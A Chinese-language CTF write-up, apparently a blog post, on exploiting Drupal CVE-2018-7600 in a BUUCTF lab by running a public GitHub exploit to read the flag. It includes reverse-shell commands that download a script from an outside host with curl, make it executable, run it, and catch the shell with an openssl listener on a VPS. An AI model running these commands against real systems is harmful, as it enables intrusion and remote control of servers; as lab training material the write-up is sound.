[Drupal]CVE-2018-7600 BUUCTF

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!
前期准备

进入之后环境安装
语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步

在这里插入图片描述

利用

直接使用网上公开的exp
	https://github.com/a2u/CVE-2018-7600
将exp里的命令换成env即可

查看flag
反弹会话
可参考我上一篇文章,ssl反弹shell [struts2]s2-052 BUUCTF

在本地工具代码里修改--下载脚本文件
curl -O http://1.1.1.1:8080/openssl.sh
在本地工具代码里修改--赋予权限
chmod 777 openssl.sh
在vps运行openssl进行监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
在本地工具代码里修改--执行脚本
/bin/bash ./openssl.sh
在vps里就可看到成功获得了一个shell

成功获得反弹shell
后面就是尝试提权,这里是buu靶场,就不搞了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值